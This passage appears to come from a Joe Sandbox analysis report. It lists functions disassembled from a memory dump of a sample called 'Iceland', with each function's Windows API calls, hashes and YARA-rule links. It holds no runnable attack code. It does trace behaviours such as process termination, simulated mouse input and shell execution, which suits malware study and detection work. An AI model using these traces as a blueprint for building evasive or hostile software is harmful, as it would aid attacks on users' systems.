Instruction Fuzzy Hash: C841B370209344AFD710DF15DCC4FB67BA8EF46324F140669FAA58A2B1C7309D84EBA1

Function 00981196 Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 009811B3
ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 009811EE
EnterCriticalSection.KERNEL32(?), ref: 0098120A
LeaveCriticalSection.KERNEL32(?), ref: 00981283
ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0098129A
InterlockedExchange.KERNEL32(?,000001F6), ref: 009812C8

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: b88eca9059cd2ea90ffbfc0a5a7c818eee681910a7be75c9246ddf5f9b493818
Instruction ID: 287a9ec72ba1e282d680d673c77dfc6e50bbe1355673c393824b846d40d3a0f5
Opcode Fuzzy Hash: b88eca9059cd2ea90ffbfc0a5a7c818eee681910a7be75c9246ddf5f9b493818
Instruction Fuzzy Hash: 64415A71904205EFDF04AF94DC85AAAB7B8FF85714F1440A5ED009A296DB30DE51DFA0

Function 009A8C36 Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0096FBEF,00000000,?,?,00000000,?,009539E2,00000004,00000000,00000000), ref: 009A8CA7
EnableWindow.USER32(?,00000000), ref: 009A8CCD
ShowWindow.USER32(FFFFFFFF,00000000), ref: 009A8D2C
ShowWindow.USER32(?,00000004), ref: 009A8D40
EnableWindow.USER32(?,00000001), ref: 009A8D66
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 009A8D8A

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: c7e17c202e33e6ccdec5c2b2a7cae1103cc57f0fcbc09f4e820e9199dba61393
Instruction ID: 3067616e5673476df2fa9284074e4c3e9fdca1ee53eaeec084238e14f6fcbd47
Opcode Fuzzy Hash: c7e17c202e33e6ccdec5c2b2a7cae1103cc57f0fcbc09f4e820e9199dba61393
Instruction Fuzzy Hash: FD41AF70606244AFDB25DF24C989BA67BF9FB47314F1840A9E5494F2A2CB31AC45DFA0

Function 00992D37 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,00000000), ref: 00992D45

Part of subcall function 0098EF33: GetWindowRect.USER32(?,?), ref: 0098EF4B

GetDesktopWindow.USER32 ref: 00992D6F
GetWindowRect.USER32(00000000), ref: 00992D76
mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00992DB2
GetCursorPos.USER32(?), ref: 00992DDE
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00992E3C

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForeground
String ID:
API String ID: 2387181109-0
Opcode ID: 38319603fbbdb08043e8f0ecd81829564929878076517617f00de011bad7c083
Instruction ID: a2cbb48727a617ec11078378c57eadf09334d32a8b5b5900e791ae090a4ffa2e
Opcode Fuzzy Hash: 38319603fbbdb08043e8f0ecd81829564929878076517617f00de011bad7c083
Instruction Fuzzy Hash: 9431DE72509315AFDB20DF18C849B9BB7A9FFC5314F00091AF899A7191DB31E908CBD2

Function 009755E1 Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 009755F9
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00975616
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0097564E
_wcslen.LIBCMT ref: 0097566C
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00975674
_wcsstr.LIBVCRUNTIME ref: 0097567E

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
String ID:
API String ID: 72514467-0
Opcode ID: cced4b1a2dd1f2d8f50337c952c3469ce5e1c12c33ce80efc2fe38cb503ef582
Instruction ID: e3d6bc642a7fc6bcb38a77eb528d82cfaa7bc7ca6076ea6878cb190576de5099
Opcode Fuzzy Hash: cced4b1a2dd1f2d8f50337c952c3469ce5e1c12c33ce80efc2fe38cb503ef582
Instruction Fuzzy Hash: 0A2126722086007BEB555B649C49F7F7BACDF85710F158029F80ACA091EBA5DC419AA0

Function 00986263 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON

Download Yara Rule

APIs

Part of subcall function 00915851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009155D1,?,?,00954B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00915871

_wcslen.LIBCMT ref: 009862C0
CoInitialize.OLE32(00000000), ref: 009863DA
CoCreateInstance.OLE32(009B0CC4,00000000,00000001,009B0B34,?), ref: 009863F3
CoUninitialize.OLE32 ref: 00986411

Strings

.lnk, xrefs: 009862BB, 00986306, 009863CA

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
String ID: .lnk
API String ID: 3172280962-24824748
Opcode ID: 5743fcbfebaf1020e352f86e5b341b4897c980b1804658399b0891cea110e69c
Instruction ID: 138951517b568dbad3fc78b2dfffbb13ac06c01947f633ed5fbfb629ff52feda
Opcode Fuzzy Hash: 5743fcbfebaf1020e352f86e5b341b4897c980b1804658399b0891cea110e69c
Instruction Fuzzy Hash: 57D12171A082059FC714EF24C484A6ABBF9FF89714F14885DF89A9B361DB31EC45CB92

Function 009A86FC Relevance: 9.1, APIs: 6, Instructions: 82COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 009A8740
SetWindowLongW.USER32(00000000,000000F0,?), ref: 009A8765
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 009A877D
GetSystemMetrics.USER32(00000004), ref: 009A87A6
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,0098C1F2,00000000), ref: 009A87C6

Part of subcall function 0091249F: GetWindowLongW.USER32(00000000,000000EB), ref: 009124B0

GetSystemMetrics.USER32(00000004), ref: 009A87B1

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 6ea53a95d9c3282b18e2744fbf5283dd876cdf7d159dca16c00add4e77721475
Instruction ID: f40947e0e7e507968befc748335a0a06fe976ec634b25ad9126fb91fd6fc341f
Opcode Fuzzy Hash: 6ea53a95d9c3282b18e2744fbf5283dd876cdf7d159dca16c00add4e77721475
Instruction Fuzzy Hash: 8121A1716252419FCB149F38CC48A6B3BA9EF86325F244A29F927C65F0EF308850DB90

Function 009336F2 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,009336E9,00933355), ref: 00933700
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0093370E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00933727
SetLastError.KERNEL32(00000000,?,009336E9,00933355), ref: 00933779

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 89749f34550e8c0481bfac43703fd091af3d6ded29f4b6eb841a23951ae159d1
Instruction ID: 5aa336dacebcbfc41d57acf51ba396af771999938b5125522a95d2670bb04fa1
Opcode Fuzzy Hash: 89749f34550e8c0481bfac43703fd091af3d6ded29f4b6eb841a23951ae159d1
Instruction Fuzzy Hash: B301D8B25EF3116EA62427B5BCC67662B98EB86776F20822AF111810F0EF514D416980

Function 009430E7 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,00934D53,00000000,?,?,009368E2,?,?,00000000), ref: 009430EB
_free.LIBCMT ref: 0094311E
_free.LIBCMT ref: 00943146
SetLastError.KERNEL32(00000000,?,00000000), ref: 00943153
SetLastError.KERNEL32(00000000,?,00000000), ref: 0094315F
_abort.LIBCMT ref: 00943165

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: cec53db5587c1b8dde1dd915aa9eb11a008b947b324183914a2bf6f6a3767fce
Instruction ID: 69f4e4ea5ea01117f790909e21dbdcd5144a2ec668a02ca78e4b930da0f64375
Opcode Fuzzy Hash: cec53db5587c1b8dde1dd915aa9eb11a008b947b324183914a2bf6f6a3767fce
Instruction Fuzzy Hash: 1BF04C3695D50127C6163735AC06F6E136EAFC9774F318425FA24D26D1FF248E0251A1

Function 009A9480 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00911F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00911F87
Part of subcall function 00911F2D: SelectObject.GDI32(?,00000000), ref: 00911F96
Part of subcall function 00911F2D: BeginPath.GDI32(?), ref: 00911FAD
Part of subcall function 00911F2D: SelectObject.GDI32(?,00000000), ref: 00911FD6

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 009A94AA
LineTo.GDI32(?,00000003,00000000), ref: 009A94BE
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 009A94CC
LineTo.GDI32(?,00000000,00000003), ref: 009A94DC
EndPath.GDI32(?), ref: 009A94EC
StrokePath.GDI32(?), ref: 009A94FC

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 1e87ca1d9cd958086ea451f36a6b88ac3db2cb2a3767c6fe2142c37eab1d4120
Instruction ID: f42b11f146741ab9e7c2d2395b8a15d51d12216d565883be9d28063542183c92
Opcode Fuzzy Hash: 1e87ca1d9cd958086ea451f36a6b88ac3db2cb2a3767c6fe2142c37eab1d4120
Instruction Fuzzy Hash: 1A111B7201515DBFDF029F90DC89E9A7F6DEF09364F008011FA1A4A1A1C7719D56EBA0

Function 00975B61 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00975B7C
GetDeviceCaps.GDI32(00000000,00000058), ref: 00975B8D
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00975B94
ReleaseDC.USER32(00000000,00000000), ref: 00975B9C
MulDiv.KERNEL32(000009EC,?,00000000), ref: 00975BB3
MulDiv.KERNEL32(000009EC,00000001,?), ref: 00975BC5

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: fc0d06d8de144e3fd59f62dd13753c29216c47c2329bd881aad87cc0fd700888
Instruction ID: f47fbaf548f5406a26a1df2cf06f4a233a049ed22b9d903e293b2342fd3e01f1
Opcode Fuzzy Hash: fc0d06d8de144e3fd59f62dd13753c29216c47c2329bd881aad87cc0fd700888
Instruction Fuzzy Hash: 5301A276E04318BBEB109FA59C49F9EBFB8EF49351F008065FA09A7280D6709C01DFA0

Function 0091327E Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 009132AF
MapVirtualKeyW.USER32(00000010,00000000), ref: 009132B7
MapVirtualKeyW.USER32(000000A0,00000000), ref: 009132C2
MapVirtualKeyW.USER32(000000A1,00000000), ref: 009132CD
MapVirtualKeyW.USER32(00000011,00000000), ref: 009132D5
MapVirtualKeyW.USER32(00000012,00000000), ref: 009132DD

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 24253bfb3ab2d61a6d5532ef8f3962d966d7cb9eed42fc2d0cfbd7abab60958a
Instruction ID: 13b3eaa10a4ea45278883f363a57857f5e36a8098a701bc491d0c8c92843836a
Opcode Fuzzy Hash: 24253bfb3ab2d61a6d5532ef8f3962d966d7cb9eed42fc2d0cfbd7abab60958a
Instruction Fuzzy Hash: 880167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C4BA42C7F5A864CBE5

Function 0097F437 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0097F447
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0097F45D
GetWindowThreadProcessId.USER32(?,?), ref: 0097F46C
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0097F47B
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0097F485
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0097F48C

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: ed05661b5e16a5aaa9612e66f0e8cffe68ff36c49c3988b2cbffc71352896a4a
Instruction ID: d137b49b2528a604ed6070f4f70b042b68d6079bc12e4d4d6e54306a6ef72f23
Opcode Fuzzy Hash: ed05661b5e16a5aaa9612e66f0e8cffe68ff36c49c3988b2cbffc71352896a4a
Instruction Fuzzy Hash: 8AF03072256158BBE72557529C0EEEF3B7CEFC7B15F000058F60691090DBA05A01E6F5

Function 009534D6 Relevance: 9.0, APIs: 6, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?), ref: 009534EF
SendMessageW.USER32(?,00001328,00000000,?), ref: 00953506
GetWindowDC.USER32(?), ref: 00953512
GetPixel.GDI32(00000000,?,?), ref: 00953521
ReleaseDC.USER32(?,00000000), ref: 00953533
GetSysColor.USER32(00000005), ref: 0095354D

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: ClientColorMessagePixelRectReleaseSendWindow
String ID:
API String ID: 272304278-0
Opcode ID: 9758fab67d7b2fd0493faa1a841185193e5ac0f6a8d6b538cae3b17b920285b4
Instruction ID: d9a4ad59c077f661bdc7a3e40d28ceef01d3c84778e887f42b0d774bd84e6f12
Opcode Fuzzy Hash: 9758fab67d7b2fd0493faa1a841185193e5ac0f6a8d6b538cae3b17b920285b4
Instruction Fuzzy Hash: B401AD71519104EFDB109F60DC08FE97BB5FF05321F100520F92AA25A0CB311E92AF40

Function 009721C1 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 009721CC
UnloadUserProfile.USERENV(?,?), ref: 009721D8
CloseHandle.KERNEL32(?), ref: 009721E1
CloseHandle.KERNEL32(?), ref: 009721E9
GetProcessHeap.KERNEL32(00000000,?), ref: 009721F2
HeapFree.KERNEL32(00000000), ref: 009721F9

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 35fcfd344c0e96d03958457f644965e32500d799ca5bf9303f5bcc33fa3456b9
Instruction ID: 0e13d3aab7f9ec6d7f3ba89ac47c3cf7e41d41329461f62ef3ea9b5fda968671
Opcode Fuzzy Hash: 35fcfd344c0e96d03958457f644965e32500d799ca5bf9303f5bcc33fa3456b9
Instruction Fuzzy Hash: D8E0E57611D105BBDB051FA1EC0C94ABF39FF4A322B104220F22682870CB329421EF90

Function 0097CE7B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 009141EA: _wcslen.LIBCMT ref: 009141EF

GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0097CF99
_wcslen.LIBCMT ref: 0097CFE0
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0097D047
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0097D075

Strings

0, xrefs: 0097CF5A

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default
String ID: 0
API String ID: 1227352736-4108050209
Opcode ID: 7d7d9db1620b50f11cc6d685cd0818d3c8bef1b0e5b80706b379bc8250e48cb0
Instruction ID: eba2a3a130ae2056590c2f9ed2da4aa66cb063a27b51db327ce7ea65874fcb67
Opcode Fuzzy Hash: 7d7d9db1620b50f11cc6d685cd0818d3c8bef1b0e5b80706b379bc8250e48cb0
Instruction Fuzzy Hash: 5051F07260A3009FE724AF28C845B6BB7FCAF89314F049A2DF999D3191DB70CD458B52

Function 0099B7C4 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 0099B903

Part of subcall function 009141EA: _wcslen.LIBCMT ref: 009141EF

GetProcessId.KERNEL32(00000000), ref: 0099B998
CloseHandle.KERNEL32(00000000), ref: 0099B9C7

Strings

<, xrefs: 0099B8CB
@, xrefs: 0099B8D2

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: CloseExecuteHandleProcessShell_wcslen
String ID: <$@
API String ID: 146682121-1426351568
Opcode ID: ab8854587f28d7bc03558c6e272cb0cd9aca43b7c827d72ce49038cf641651a1
Instruction ID: a7b6c6b1c4010d99430162c72b09367cb17e73a679681bf9b5dc50885e0faebe
Opcode Fuzzy Hash: ab8854587f28d7bc03558c6e272cb0cd9aca43b7c827d72ce49038cf641651a1
Instruction Fuzzy Hash: 9E716775A00219DFCF10EF58C595A9EBBF4BF48304F048499E85AAB351CB74AD81CB90

Function 00977B05 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00977B6D
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00977BA3
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00977BB4
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00977C36

Strings

DllGetClassObject, xrefs: 00977BA9

Memory Dump Source

